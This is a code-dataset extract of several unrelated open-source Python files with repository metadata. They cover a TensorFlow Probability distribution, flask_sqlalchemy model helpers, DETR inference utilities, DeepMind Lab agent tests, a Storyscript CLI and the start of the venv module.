result is undefined. When `False`, an exception is raised if one or
more of the statistic's batch members are undefined.
Default value: `True`.
name: Python `str` name prefixed to Ops created by this class.
Default value: `'Triangular'`.
Raises:
InvalidArgumentError: if `validate_args=True` and one of the following is
True:
* `low >= high`.
* `peak > high`.
* `low > peak`.
"""
parameters = dict(locals())
with tf.name_scope(name) as name:
dtype = dtype_util.common_dtype([low, high, peak], tf.float32)
self._low = tensor_util.convert_nonref_to_tensor(
low, name='low', dtype=dtype)
self._high = tensor_util.convert_nonref_to_tensor(
high, name='high', dtype=dtype)
self._peak = tensor_util.convert_nonref_to_tensor(
peak, name='peak', dtype=dtype)
super(Triangular, self).__init__(
dtype=self._low.dtype,
reparameterization_type=reparameterization.FULLY_REPARAMETERIZED,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
name=name)
@classmethod
def _parameter_properties(cls, dtype, num_classes=None):
return dict(
low=parameter_properties.ParameterProperties(),
# TODO(b/169874884): Support decoupled parameterization.
high=parameter_properties.ParameterProperties(
default_constraining_bijector_fn=parameter_properties
.BIJECTOR_NOT_IMPLEMENTED,),
# TODO(b/169874884): Support decoupled parameterization.
peak=parameter_properties.ParameterProperties(
default_constraining_bijector_fn=parameter_properties
.BIJECTOR_NOT_IMPLEMENTED,))
@property
def low(self):
"""Lower boundary of the interval."""
return self._low
@property
def high(self):
"""Upper boundary of the interval."""
return self._high
@property
def peak(self):
"""Peak of the distribution. Lies in the interval."""
return self._peak
def _pdf_at_peak(self):
"""Pdf evaluated at the peak."""
return (self.peak - self.low) / (self.high - self.low)
def _event_shape(self):
return tf.TensorShape([])
def _sample_n(self, n, seed=None):
low = tf.convert_to_tensor(self.low)
high = tf.convert_to_tensor(self.high)
peak = tf.convert_to_tensor(self.peak)
seed = samplers.sanitize_seed(seed, salt='triangular')
shape = ps.concat([[n], self._batch_shape_tensor(
low=low, high=high, peak=peak)], axis=0)
samples = samplers.uniform(shape=shape, dtype=self.dtype, seed=seed)
# We use Inverse CDF sampling here. Because the CDF is a quadratic function,
# we must use sqrts here.
interval_length = high - low
return tf.where(
# Note the CDF on the left side of the peak is
# (x - low) ** 2 / ((high - low) * (peak - low)).
# If we plug in peak for x, we get that the CDF at the peak
# is (peak - low) / (high - low). Because of this we decide
# which part of the piecewise CDF we should use based on the cdf samples
# we drew.
samples < (peak - low) / interval_length,
# Inverse of (x - low) ** 2 / ((high - low) * (peak - low)).
low + tf.sqrt(samples * interval_length * (peak - low)),
# Inverse of 1 - (high - x) ** 2 / ((high - low) * (high - peak))
high - tf.sqrt((1. - samples) * interval_length * (high - peak)))
def _prob(self, x):
low = tf.convert_to_tensor(self.low)
high = tf.convert_to_tensor(self.high)
peak = tf.convert_to_tensor(self.peak)
interval_length = high - low
# This is the pdf function when a low <= high <= x. This looks like
# a triangle, so we have to treat each line segment separately.
result_inside_interval = tf.where(
(x >= low) & (x <= peak),
# Line segment from (low, 0) to (peak, 2 / (high - low)).
2. * (x - low) / (interval_length * (peak - low)),
# Line segment from (peak, 2 / (high - low)) to (high, 0).
2. * (high - x) / (interval_length * (high - peak)))
return tf.where((x < low) | (x > high),
tf.zeros_like(x),
result_inside_interval)
def _cdf(self, x):
low = tf.convert_to_tensor(self.low)
high = tf.convert_to_tensor(self.high)
peak = tf.convert_to_tensor(self.peak)
interval_length = high - low
# Due to the PDF being not smooth at the peak, we have to treat each side
# somewhat differently. The PDF is two line segments, and thus we get
# quadratics here for the CDF.
result_inside_interval = tf.where(
(x >= low) & (x <= peak),
# (x - low) ** 2 / ((high - low) * (peak - low))
tf.math.squared_difference(x, low) / (interval_length * (peak - low)),
# 1 - (high - x) ** 2 / ((high - low) * (high - peak))
1. - tf.math.squared_difference(high, x) / (
interval_length * (high - peak)))
# We now add that the left tail is 0 and the right tail is 1.
result_if_not_big = tf.where(
x < low, tf.zeros_like(x), result_inside_interval)
return tf.where(x >= high, tf.ones_like(x), result_if_not_big)
def _entropy(self):
return 0.5 - np.log(2.) + tf.math.log(self.high - self.low)
def _mean(self):
return (self.low + self.high + self.peak) / 3.
def _variance(self):
# ((high - low) ** 2 + (peak - low) ** 2 + (peak - high) ** 2) / 36
low = tf.convert_to_tensor(self.low)
high = tf.convert_to_tensor(self.high)
peak = tf.convert_to_tensor(self.peak)
return (tf.math.squared_difference(high, low) +
tf.math.squared_difference(high, peak) +
tf.math.squared_difference(peak, low)) / 36.
def _default_event_space_bijector(self):
return sigmoid_bijector.Sigmoid(
low=self.low, high=self.high, validate_args=self.validate_args)
def _parameter_control_dependencies(self, is_init):
if not self.validate_args:
return []
low = tf.convert_to_tensor(self.low)
high = tf.convert_to_tensor(self.high)
peak = tf.convert_to_tensor(self.peak)
assertions = []
if (is_init != tensor_util.is_ref(self.low) and
is_init != tensor_util.is_ref(self.high)):
assertions.append(assert_util.assert_less(
low, high, message='triangular not defined when low >= high.'))
if (is_init != tensor_util.is_ref(self.low) and
is_init != tensor_util.is_ref(self.peak)):
assertions.append(
assert_util.assert_less_equal(
low, peak, message='triangular not defined when low > peak.'))
if (is_init != tensor_util.is_ref(self.high) and
is_init != tensor_util.is_ref(self.peak)):
assertions.append(
assert_util.assert_less_equal(
peak, high, message='triangular not defined when peak > high.'))
return assertions
def _sample_control_dependencies(self, x):
assertions = []
if not self.validate_args:
return assertions
assertions.append(assert_util.assert_greater_equal(
x, self.low, message='Sample must be greater than or equal to `low`.'))
assertions.append(assert_util.assert_less_equal(
x, self.high, message='Sample must be less than or equal to `high`.'))
return assertions
| 37.288525
| 80
| 0.641431
|
f9a1496b7e654ae4d2966528a807a49cd3966417
| 5,142
|
py
|
Python
|
python3-virtualenv/Lib/python3.6/site-packages/flask_sqlalchemy/model.py
|
LindaNayeli104/mlh-orientation-hackathon-project
|
d86b58f76721a9d5f3374399bfc6d3b1445d16ca
|
[
"MIT"
] | null | null | null |
python3-virtualenv/Lib/python3.6/site-packages/flask_sqlalchemy/model.py
|
LindaNayeli104/mlh-orientation-hackathon-project
|
d86b58f76721a9d5f3374399bfc6d3b1445d16ca
|
[
"MIT"
] | null | null | null |
python3-virtualenv/Lib/python3.6/site-packages/flask_sqlalchemy/model.py
|
LindaNayeli104/mlh-orientation-hackathon-project
|
d86b58f76721a9d5f3374399bfc6d3b1445d16ca
|
[
"MIT"
] | 1
|
2021-06-20T19:28:37.000Z
|
2021-06-20T19:28:37.000Z
|
import re
import sqlalchemy as sa
from sqlalchemy import inspect
from sqlalchemy.ext.declarative import DeclarativeMeta, declared_attr
from sqlalchemy.schema import _get_table_key
from ._compat import to_str
def should_set_tablename(cls):
"""Determine whether ``__tablename__`` should be automatically generated
for a model.
* If no class in the MRO sets a name, one should be generated.
* If a declared attr is found, it should be used instead.
* If a name is found, it should be used if the class is a mixin, otherwise
one should be generated.
* Abstract models should not have one generated.
Later, :meth:`._BoundDeclarativeMeta.__table_cls__` will determine if the
model looks like single or joined-table inheritance. If no primary key is
found, the name will be unset.
"""
if (
cls.__dict__.get('__abstract__', False)
or not any(isinstance(b, DeclarativeMeta) for b in cls.__mro__[1:])
):
return False
for base in cls.__mro__:
if '__tablename__' not in base.__dict__:
continue
if isinstance(base.__dict__['__tablename__'], declared_attr):
return False
return not (
base is cls
or base.__dict__.get('__abstract__', False)
or not isinstance(base, DeclarativeMeta)
)
return True
camelcase_re = re.compile(r'([A-Z]+)(?=[a-z0-9])')
def camel_to_snake_case(name):
def _join(match):
word = match.group()
if len(word) > 1:
return ('_%s_%s' % (word[:-1], word[-1])).lower()
return '_' + word.lower()
return camelcase_re.sub(_join, name).lstrip('_')
class NameMetaMixin(type):
def __init__(cls, name, bases, d):
if should_set_tablename(cls):
cls.__tablename__ = camel_to_snake_case(cls.__name__)
super(NameMetaMixin, cls).__init__(name, bases, d)
# __table_cls__ has run at this point
# if no table was created, use the parent table
if (
'__tablename__' not in cls.__dict__
and '__table__' in cls.__dict__
and cls.__dict__['__table__'] is None
):
del cls.__table__
def __table_cls__(cls, *args, **kwargs):
"""This is called by SQLAlchemy during mapper setup. It determines the
final table object that the model will use.
If no primary key is found, that indicates single-table inheritance,
so no table will be created and ``__tablename__`` will be unset.
"""
# check if a table with this name already exists
# allows reflected tables to be applied to model by name
key = _get_table_key(args[0], kwargs.get('schema'))
if key in cls.metadata.tables:
return sa.Table(*args, **kwargs)
# if a primary key or constraint is found, create a table for
# joined-table inheritance
for arg in args:
if (
(isinstance(arg, sa.Column) and arg.primary_key)
or isinstance(arg, sa.PrimaryKeyConstraint)
):
return sa.Table(*args, **kwargs)
# if no base classes define a table, return one
# ensures the correct error shows up when missing a primary key
for base in cls.__mro__[1:-1]:
if '__table__' in base.__dict__:
break
else:
return sa.Table(*args, **kwargs)
# single-table inheritance, use the parent tablename
if '__tablename__' in cls.__dict__:
del cls.__tablename__
class BindMetaMixin(type):
def __init__(cls, name, bases, d):
bind_key = (
d.pop('__bind_key__', None)
or getattr(cls, '__bind_key__', None)
)
super(BindMetaMixin, cls).__init__(name, bases, d)
if bind_key is not None and getattr(cls, '__table__', None) is not None:
cls.__table__.info['bind_key'] = bind_key
class DefaultMeta(NameMetaMixin, BindMetaMixin, DeclarativeMeta):
pass
class Model(object):
"""Base class for SQLAlchemy declarative base model.
To define models, subclass :attr:`db.Model <SQLAlchemy.Model>`, not this
class. To customize ``db.Model``, subclass this and pass it as
``model_class`` to :class:`SQLAlchemy`.
"""
#: Query class used by :attr:`query`. Defaults to
# :class:`SQLAlchemy.Query`, which defaults to :class:`BaseQuery`.
query_class = None
#: Convenience property to query the database for instances of this model
# using the current session. Equivalent to ``db.session.query(Model)``
# unless :attr:`query_class` has been changed.
query = None
def __repr__(self):
identity = inspect(self).identity
if identity is None:
pk = "(transient {0})".format(id(self))
else:
pk = ', '.join(to_str(value) for value in identity)
return '<{0} {1}>'.format(type(self).__name__, pk)
| 33.174194
| 81
| 0.609685
|
e9a734c8702e39ccfebb37c6b3ffa933b9387767
| 605
|
py
|
Python
|
beatsaver/entity/MapParitySummary.py
|
jundoll/bs-api-py
|
1e12e1d68d6cbc4c8e25c0da961396854391be5b
|
[
"MIT"
] | null | null | null |
beatsaver/entity/MapParitySummary.py
|
jundoll/bs-api-py
|
1e12e1d68d6cbc4c8e25c0da961396854391be5b
|
[
"MIT"
] | null | null | null |
beatsaver/entity/MapParitySummary.py
|
jundoll/bs-api-py
|
1e12e1d68d6cbc4c8e25c0da961396854391be5b
|
[
"MIT"
] | null | null | null |
# load modules
from dataclasses import dataclass
# definition class
@dataclass(frozen=True)
class MapParitySummary:
errors: int
resets: int
warns: int
# definition function
def gen(response):
if response is not None:
instance = MapParitySummary(
errors=response.get('errors'),
resets=response.get('resets'),
warns=response.get('warns')
)
return instance
def gen_list(response):
if response is not None:
if len(response) == 0:
return []
else:
return [gen(v) for v in response]
| 18.333333
| 45
| 0.601653
|
fe86c657be4152059da23e31836f4e2f4270b808
| 8,427
|
py
|
Python
|
inference/utils.py
|
joyjeni/detr-fine
|
dfc0f4abc2579a2b3ef4527904af3345c7a9de4d
|
[
"Apache-2.0"
] | null | null | null |
inference/utils.py
|
joyjeni/detr-fine
|
dfc0f4abc2579a2b3ef4527904af3345c7a9de4d
|
[
"Apache-2.0"
] | null | null | null |
inference/utils.py
|
joyjeni/detr-fine
|
dfc0f4abc2579a2b3ef4527904af3345c7a9de4d
|
[
"Apache-2.0"
] | null | null | null |
import math
import time
import datetime
import io
import itertools
import torch
from pathlib import Path
from copy import deepcopy
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from PIL import Image, ImageDraw, ImageFont
from panopticapi.utils import id2rgb, rgb2id
from detectron2.utils.visualizer import Visualizer
from detr.datasets.construction import make_construction_transforms
from detr.datasets.categories_meta import id2cat, get_builtin_metadata
palette = itertools.cycle(sns.color_palette())
meta = get_builtin_metadata("construction_panoptic_separated")
def load_image(pth, fixed_height=800):
impath = Path(pth)
imo = Image.open(impath)
height_percent = (fixed_height / float(imo.size[1]))
width_size = int((float(imo.size[0]) * float(height_percent)))
imo = imo.resize((width_size, fixed_height))
iw, ih = imo.size
return imo, iw, ih
def apply_transform(imo, iw, ih, device):
transform = make_construction_transforms("val")
dummy_target = {
"size": torch.as_tensor([int(ih), int(iw)]),
"orig_size": torch.as_tensor([int(ih), int(iw)])
}
image, targets = transform(imo, dummy_target)
image = image.unsqueeze(0)
image = image.to(device)
return image
def run_prediction(model, image, postprocessors, device, threshold=0.85):
outputs = model.to(device)(image)
postprocessors['panoptic'].threshold = threshold
panoptic = postprocessors['panoptic'](outputs, torch.as_tensor(image.shape[-2:]).unsqueeze(0))[0]
logits = outputs["pred_logits"].cpu()
boxes = outputs["pred_boxes"].cpu()
masks = outputs["pred_masks"].cpu()
scores = logits.softmax(-1)[..., :-1].max(-1)[0]
# threshold the confidence, filter all predictions above threshod
keep = scores > threshold
return scores[keep], logits[keep], boxes[keep], masks[keep].detach().numpy(), panoptic
def overlay_boxes(img, iw, ih, scores, logits, boxes, debug=False):
imn = img.copy()
drw = ImageDraw.Draw(imn)
font = ImageFont.load_default() # ImageFont.truetype("arial")
for score, logit, box in zip(scores, logits, boxes):
cat = logit.argmax()
if cat < 1:
continue
label = f'{id2cat[cat.item()]} ({score:.2f})'
box = box * torch.Tensor([iw, ih, iw, ih])
x, y, w, h = box
# x0, x1 = x-w//2, x+w//2
# y0, y1 = y-h//2, y+h//2
rbbox = torch.tensor([(x - 0.5 * w), (y - 0.5 * h), (x + 0.5 * w), (y + 0.5 * h)]).cpu()
rbbox[0::2].clamp_(min=0, max=torch.tensor(iw))
rbbox[1::2].clamp_(min=0, max=torch.tensor(ih))
if debug:
print(label, rbbox)
drw.rectangle(list(rbbox), outline='red', width=3)
# drw.text((rbbox[0]+4, rbbox[1]+2), label, fill='white')
# get text size
text_size = font.getsize(label)
# set button size + 10px margins
label_size = (text_size[0]+6, text_size[1]+6)
# create image with correct size and black background
label_img = Image.new('RGBA', label_size, "green")
# put text on button with 10px margins
label_draw = ImageDraw.Draw(label_img)
label_draw.text((3, 3), label, font=font, fill='white')
# put text on source image in position (x+2, y+2)
imn.paste(label_img, (rbbox[0]+2, rbbox[1]+2))
return imn
def get_panoptic_mask(panoptic):
# The segmentation is stored in a special-format png
panoptic_seg = Image.open(io.BytesIO(panoptic['png_string']))
# Convert to numpy array
panoptic_seg = np.array(panoptic_seg, dtype=np.uint8).copy()
# We retrieve the ids corresponding to each mask
panoptic_seg_id = rgb2id(panoptic_seg)
# Finally we color each mask individually
panoptic_seg[:, :, :] = np.asarray(next(palette)) * 255
for sid in range(panoptic_seg_id.max() + 1):
panoptic_seg[panoptic_seg_id == sid] = np.asarray(next(palette)) * 255
return panoptic_seg
def get_panoptic_overlay(imo, panoptic):
# The segmentation is stored in a special-format png
panoptic_seg = Image.open(io.BytesIO(panoptic['png_string']))
pw, ph = panoptic_seg.size
# Convert to numpy array
panoptic_seg = np.array(panoptic_seg, dtype=np.uint8).copy()
# We retrieve the ids corresponding to each mask
panoptic_seg_id = rgb2id(panoptic_seg)
panoptic_seg_id_tensor = torch.from_numpy(panoptic_seg_id)
segments_info = deepcopy(panoptic["segments_info"])
for i in range(len(segments_info)):
c = segments_info[i]["category_id"]
segments_info[i]["category_id"] = meta.thing_dataset_id_to_contiguous_id[c] if segments_info[i]["isthing"] else meta.stuff_dataset_id_to_contiguous_id[c]
# Finally we visualize the prediction
visualize = Visualizer(np.array(imo.copy().resize((pw, ph)))[:, :, ::-1], meta, scale=1.0)
visualize._default_font_size = 20
visualize = visualize.draw_panoptic_seg_predictions(panoptic_seg_id_tensor, segments_info, area_threshold=0)
overlayed = visualize.get_image()
return overlayed
def get_masks(logits, masks):
mask_array = []
for logit, mask in zip(logits, masks):
cat = logit.argmax()
if cat < 1:
continue
mask_array.append({
'mask': mask,
'label': f'{id2cat[cat.item()]}'
})
return mask_array
def get_prediction(pth, model, threshold, device, debug=False):
start = time.time()
result = {}
# Load image with path provided
imo, iw, ih = load_image(pth)
result["original_image"] = imo
# Apply transform to normalize and convert to tensor
image = apply_transform(imo, iw, ih, device)
# Run prediction and threshold output
scores, logits, boxes, masks, panoptic = run_prediction(model, image, postprocessors, device, threshold)
result["boxed_image"] = overlay_boxes(imo, iw, ih, scores, logits, boxes, debug=debug)
result["mask_images"] = get_masks(logits, masks)
result["panoptic_mask"] = get_panoptic_mask(panoptic)
result["panoptic_image"] = get_panoptic_overlay(imo, panoptic)
print(f"Time Taken: {datetime.timedelta(seconds=int(time.time() - start))}")
return result, logits, boxes, masks # keep, pred_logits, pred_masks.detach().numpy(), imn, result_panoptic
def visualize_masks(masks):
# Plot all the remaining masks
if len(masks) == 1:
plt.imshow(masks[0]["mask"], cmap="cividis")
# plt.set_title(f'{id2cat[pred_logits[1].argmax().item()]}', {'fontsize': 15})
plt.axis('off')
elif len(masks) == 2:
_, axarr = plt.subplots(1,2, figsize=(10, 10))
for i, ax in enumerate(axarr):
ax.imshow(masks[i]["mask"], cmap="cividis")
ax.set_title(f'{masks[i]["label"]}', {'fontsize': 15})
ax.axis('off')
else:
ncols = 2
fig, axs = plt.subplots(ncols=ncols, nrows=math.ceil(len(masks) / ncols), figsize=(15, 10))
# for aa in axs:
# for ax in aa:
# ax.axis('off')
for i, mask in enumerate(masks):
ax = axs[i // ncols, i % ncols]
ax.imshow(mask["mask"], cmap="cividis")
ax.set_title(mask["label"], {'fontsize': 15})
ax.axis('off')
fig.tight_layout()
plt.show()
def visualize_predictions(result, save_result=False, name='result.png'):
_, axarr = plt.subplots(2, 2, figsize=(20,10))
axarr[0][0].imshow(result["original_image"])
axarr[0][0].set_title('Input Image', {'fontsize': 15})
axarr[0][0].axis('off')
axarr[0][1].imshow(result["boxed_image"])
axarr[0][1].set_title('Boxed Image', {'fontsize': 15})
axarr[0][1].axis('off')
# axarr[2].imshow(Image.open(f"../data/panoptic/{iname.split('.')[0]}.png"))
# axarr[2].set_title('Target Mask', {'fontsize': 15})
# axarr[2].axis('off')
axarr[1][0].imshow(result["panoptic_mask"])
axarr[1][0].axis('off')
axarr[1][0].set_title('Predicted Mask', {'fontsize': 15})
axarr[1][1].imshow(result["panoptic_image"])
axarr[1][1].axis('off')
axarr[1][1].set_title('Overlayed', {'fontsize': 15})
if save_result:
plt.savefig(f"../data/predictions/{name}", bbox_inches='tight')
plt.show()
| 32.164122
| 161
| 0.632728
|
27e8400bb5aa13a6b575823a459aa105948e76cf
| 836
|
py
|
Python
|
src/models/model.py
|
akash-harijan/cataract-detection
|
ccb7045290a7a002bba1ff68220d19ec3a79ea2d
|
[
"MIT"
] | null | null | null |
src/models/model.py
|
akash-harijan/cataract-detection
|
ccb7045290a7a002bba1ff68220d19ec3a79ea2d
|
[
"MIT"
] | null | null | null |
src/models/model.py
|
akash-harijan/cataract-detection
|
ccb7045290a7a002bba1ff68220d19ec3a79ea2d
|
[
"MIT"
] | null | null | null |
from tensorflow import keras
import tensorflow as tf
def create_model(img_size=(160, 160, 3)):
base_model = keras.applications.MobileNetV2(
weights="imagenet",
input_shape=img_size,
include_top=False,
)
base_model.trainable = False
inputs = keras.Input(shape=img_size)
x = base_model(inputs, training=False)
x = keras.layers.GlobalAveragePooling2D()(x)
x = keras.layers.Dropout(0.2)(x) # Regularize with dropout
outputs = keras.layers.Dense(1, activation='sigmoid')(x)
model = keras.Model(inputs, outputs)
model.summary()
base_learning_rate = 0.0001
model.compile(optimizer=tf.keras.optimizers.Adam(lr=base_learning_rate),
loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
metrics=['accuracy'])
return model
| 29.857143
| 76
| 0.67823
|
1e3c1b2f82d63d436b3d191343215bffda7b1e99
| 3,122
|
py
|
Python
|
python/tests/random_agent_test.py
|
bfakhri/dml_custom
|
1e908b10890df11e510d72c21f3125e3069a0eac
|
[
"CC-BY-4.0"
] | null | null | null |
python/tests/random_agent_test.py
|
bfakhri/dml_custom
|
1e908b10890df11e510d72c21f3125e3069a0eac
|
[
"CC-BY-4.0"
] | null | null | null |
python/tests/random_agent_test.py
|
bfakhri/dml_custom
|
1e908b10890df11e510d72c21f3125e3069a0eac
|
[
"CC-BY-4.0"
] | null | null | null |
# Copyright 2016 Google Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""Basic test for the random Python agent."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import unittest
from python import random_agent
import deepmind_lab
class RandomAgentsTest(unittest.TestCase):
def test_spring_agent_run(self, length=100):
env = deepmind_lab.Lab(
'tests/empty_room_test', ['RGB_INTERLACED'],
config={
'fps': '60',
'controls': 'external',
'width': '80',
'height': '80'
})
env.reset()
agent = random_agent.SpringAgent(env.action_spec())
reward = 0
for _ in xrange(length):
if not env.is_running():
print('Environment stopped early')
env.reset()
obs = env.observations()
action = agent.step(reward, obs['RGB_INTERLACED'])
reward = env.step(action, 1)
self.assertIsInstance(reward, float)
def test_discretized_random_agent_run(self, length=100):
env = deepmind_lab.Lab(
'tests/empty_room_test', ['RGB_INTERLACED'],
config={
'fps': '60',
'width': '80',
'height': '80'
})
env.reset()
agent = random_agent.DiscretizedRandomAgent()
reward = 0
for _ in xrange(length):
if not env.is_running():
print('Environment stopped early')
env.reset()
obs = env.observations()
action = agent.step(reward, obs['RGB_INTERLACED'])
reward = env.step(action, 1)
self.assertIsInstance(reward, float)
def test_map_frame_count(self, length=100):
env = deepmind_lab.Lab(
'tests/empty_room_test', ['MAP_FRAME_NUMBER'],
config={'fps': '60',
'width': '80',
'height': '80'})
env.reset()
agent = random_agent.DiscretizedRandomAgent()
reward = 0
for frame in xrange(length):
if not env.is_running():
print('Environment stopped early')
env.reset()
obs = env.observations()
action = agent.step(reward, None)
env.step(action, 1)
frame_number = int(obs['MAP_FRAME_NUMBER'])
self.assertEquals(frame, frame_number)
if __name__ == '__main__':
if os.environ.get('TEST_SRCDIR'):
deepmind_lab.set_runfiles_path(
os.path.join(os.environ['TEST_SRCDIR'],
'org_deepmind_lab'))
unittest.main()
| 29.45283
| 73
| 0.648943
|
af43a86dfd1fac51ec074a3286dca14f904b42c4
| 867
|
py
|
Python
|
setup.py
|
TimCosby/generic_execute
|
85fdee7ea1bd6ae027223c80333bf8c6899128d9
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
TimCosby/generic_execute
|
85fdee7ea1bd6ae027223c80333bf8c6899128d9
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
TimCosby/generic_execute
|
85fdee7ea1bd6ae027223c80333bf8c6899128d9
|
[
"Apache-2.0"
] | null | null | null |
from setuptools import setup
with open('README.md', 'r') as file:
long_description = file.read()
setup(
name='gexecute',
version='0.0.6',
author='Tim Cosby',
author_email='tim470773@gmail.com',
url='https://github.com/TimCosby/generic_execute',
description='Generically execute any function with a unknown function, module, or set of parameters!',
long_description=long_description,
long_description_content_type="text/markdown",
py_modules=['gexecute'],
package_dir={'': 'src'},
license='MIT',
classifiers=[
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.4',
keywords='generic execute function module',
)
| 32.111111
| 107
| 0.637832
|
e7b09695aeb06f61a2c26b5230e0c3bd6d05d4c2
| 6,680
|
py
|
Python
|
storyscript/Cli.py
|
edvald/storyscript
|
a912586a65c1ee31cb634092e952767da6215269
|
[
"Apache-2.0"
] | null | null | null |
storyscript/Cli.py
|
edvald/storyscript
|
a912586a65c1ee31cb634092e952767da6215269
|
[
"Apache-2.0"
] | null | null | null |
storyscript/Cli.py
|
edvald/storyscript
|
a912586a65c1ee31cb634092e952767da6215269
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import io
import os
import click
from click_alias import ClickAliasedGroup
from .App import App
from .Features import Features
from .Project import Project
from .Version import version as app_version
from .exceptions import StoryError
story_features = Features.all_feature_names()
def preview_cb(ctx, param, values):
"""
Special handling for preview flags.
+<feature>, -<feature>, and <feature> are valid names for each features.
All passed -preview arguments are processed in order. Thus, if a feature
is specified twice, the later argument will overwrite the earlier.
Returns: dict of {<feature>: True/False}
"""
features = {}
for v in values:
flag = True
if v.startswith('+'):
v = v[1:]
if v.startswith('-'):
v = v[1:]
flag = False
if v in story_features:
features[v] = flag
else:
StoryError.create_error('invalid_preview_flag', flag=v).echo()
ctx.exit(1)
return features
class Cli:
version_help = 'Prints Storyscript version'
silent_help = 'Silent mode. Return syntax errors only.'
ebnf_help = 'Load the grammar from a file. Useful for development'
preview_help = 'Activate upcoming Storyscript features'
@click.group(invoke_without_command=True, cls=ClickAliasedGroup)
@click.option('--version', '-v', is_flag=True, help=version_help)
@click.pass_context
def main(context, version): # noqa N805
"""
Learn more at http://storyscript.org
"""
if version:
message = 'StoryScript {} - http://storyscript.org'
click.echo(message.format(app_version))
exit()
if context.invoked_subcommand is None:
click.echo(context.get_help())
@staticmethod
@main.command(aliases=['p'])
@click.argument('path', default=os.getcwd())
@click.option('--debug', is_flag=True)
@click.option('--ebnf', help=ebnf_help)
@click.option('--raw', is_flag=True)
@click.option('--lower', is_flag=True)
@click.option('--preview', callback=preview_cb, is_eager=True,
multiple=True, help=preview_help)
@click.option('--ignore', default=None,
help='Specify path of ignored files')
def parse(path, debug, ebnf, raw, ignore, lower, preview):
"""
Parses stories, producing the abstract syntax tree.
"""
try:
trees = App.parse(path, ignored_path=ignore, ebnf=ebnf,
lower=lower, features=preview)
for story, tree in trees.items():
click.echo('File: {}'.format(story))
if raw:
click.echo(tree)
else:
click.echo(tree.pretty())
except StoryError as e:
if debug:
raise e.error
else:
e.echo()
exit(1)
except Exception as e:
if debug:
raise e
else:
StoryError.internal_error(e).echo()
exit(1)
@staticmethod
@main.command(aliases=['c'])
@click.argument('path', default=os.getcwd())
@click.argument('output', required=False)
@click.option('--json', '-j', is_flag=True)
@click.option('--silent', '-s', is_flag=True, help=silent_help)
@click.option('--debug', is_flag=True)
@click.option('--concise', '-c', is_flag=True)
@click.option('--first', '-f', is_flag=True)
@click.option('--ebnf', help=ebnf_help)
@click.option('--ignore', default=None,
help='Specify path of ignored files')
@click.option('--preview', callback=preview_cb, is_eager=True,
multiple=True, help=preview_help)
def compile(path, output, json, silent, debug, ebnf, ignore, concise,
first, preview):
"""
Compiles stories and validates syntax
"""
try:
results = App.compile(path, ignored_path=ignore,
ebnf=ebnf, concise=concise, first=first,
features=preview)
if not silent:
if json:
if output:
with io.open(output, 'w') as f:
f.write(results)
exit()
click.echo(results)
else:
msg = 'Script syntax passed!'
click.echo(click.style(msg, fg='green'))
except StoryError as e:
if debug:
raise e.error
else:
e.echo()
exit(1)
except Exception as e:
if debug:
raise e
else:
StoryError.internal_error(e).echo()
exit(1)
@staticmethod
@main.command(aliases=['l'])
@click.argument('path', default=os.getcwd())
@click.option('--ebnf', help=ebnf_help)
@click.option('--debug', is_flag=True)
@click.option('--preview', callback=preview_cb, is_eager=True,
multiple=True, help=preview_help)
def lex(path, ebnf, debug, preview):
"""
Shows lexer tokens for given stories
"""
try:
results = App.lex(path, ebnf=ebnf, features=preview)
for file, tokens in results.items():
click.echo('File: {}'.format(file))
for n, token in enumerate(tokens):
click.echo('{} {} {}'.format(n, token.type, token.value))
except StoryError as e:
if debug:
raise e.error
else:
e.echo()
exit(1)
except Exception as e:
if debug:
raise e
else:
StoryError.internal_error(e).echo()
exit(1)
@staticmethod
@main.command(aliases=['g'])
def grammar():
"""
Prints the grammar specification
"""
click.echo(App.grammar())
@staticmethod
@main.command(aliases=['n'])
@click.argument('name')
def new(name):
"""
Creates a new project
"""
Project.new(name)
@staticmethod
@main.command(aliases=['h'])
@click.pass_context
def help(context):
"""
Prints this help text
"""
click.echo(context.parent.get_help())
@staticmethod
@main.command(aliases=['v'])
def version():
"""
Prints the current version
"""
click.echo(app_version)
| 31.509434
| 77
| 0.538024
|
8d2deb738560edfc77fe50b8b99b462e62687bbb
| 16,397
|
py
|
Python
|
front-end/testsuite-python-lib/Python-3.3.0/Lib/venv/__init__.py
|
MalloyPower/parsing-python
|
b2bca5eed07ea2af7a2001cd4f63becdfb0570be
|
[
"MIT"
] | 1
|
2020-11-26T18:53:46.000Z
|
2020-11-26T18:53:46.000Z
|
front-end/testsuite-python-lib/Python-3.3.0/Lib/venv/__init__.py
|
MalloyPower/parsing-python
|
b2bca5eed07ea2af7a2001cd4f63becdfb0570be
|
[
"MIT"
] | null | null | null |
front-end/testsuite-python-lib/Python-3.3.0/Lib/venv/__init__.py
|
MalloyPower/parsing-python
|
b2bca5eed07ea2af7a2001cd4f63becdfb0570be
|
[
"MIT"
] | 1
|
2019-04-11T11:27:01.000Z
|
2019-04-11T11:27:01.000Z
|
"""
Virtual environment (venv) package for Python. Based on PEP 405.
Copyright (C) 2011-2012 Vinay Sajip.
Licensed to the PSF under a contributor agreement.
usage: python -m venv [-h] [--system-site-packages] [--symlinks] [--clear]
[--upgrade]
ENV_DIR [ENV_DIR ...]
Creates virtual Python environments in one or more target directories.
positional arguments:
ENV_DIR A directory to create the environment in.
optional arguments:
-h, --help show this help message and exit
--system-site-packages
Give the virtual environment access to the system
site-packages dir.
--symlinks Attempt to symlink rather than copy.
--clear Delete the environment directory if it already exists.
If not specified and the directory exists, an error is
raised.
--upgrade Upgrade the environment directory to use this version
of Python, assuming Python has been upgraded in-place.
"""
import base64
